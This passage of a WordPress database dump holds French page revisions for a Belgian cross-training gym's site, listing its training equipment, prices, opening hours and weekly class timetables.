(330, 1, '2013-07-10 16:10:46', '2013-07-10 16:10:46', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-10 16:10:46', '2013-07-10 16:10:46', '', 22, 'http://www.crosstrainingcenter.be/22-revision-30/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(154, 1, '2013-06-23 14:07:38', '2013-06-23 14:07:38', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table caption=\"Just test table\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]	\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style:dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 14:07:38', '2013-06-23 14:07:38', '', 11, 'http://www.crosstrainingcenter.be/?p=154', 0, 'revision', '', 0),
(155, 1, '2013-07-03 15:41:06', '2013-07-03 15:41:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:41:06', '2013-07-03 15:41:06', '', 11, 'http://www.crosstrainingcenter.be/?p=155', 0, 'revision', '', 0),
(156, 1, '2013-07-03 15:52:51', '2013-07-03 15:52:51', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"left|right|right|right|right|right\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:52:51', '2013-07-03 15:52:51', '', 11, 'http://www.crosstrainingcenter.be/?p=156', 0, 'revision', '', 0),
(157, 1, '2013-07-03 15:53:34', '2013-07-03 15:53:34', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 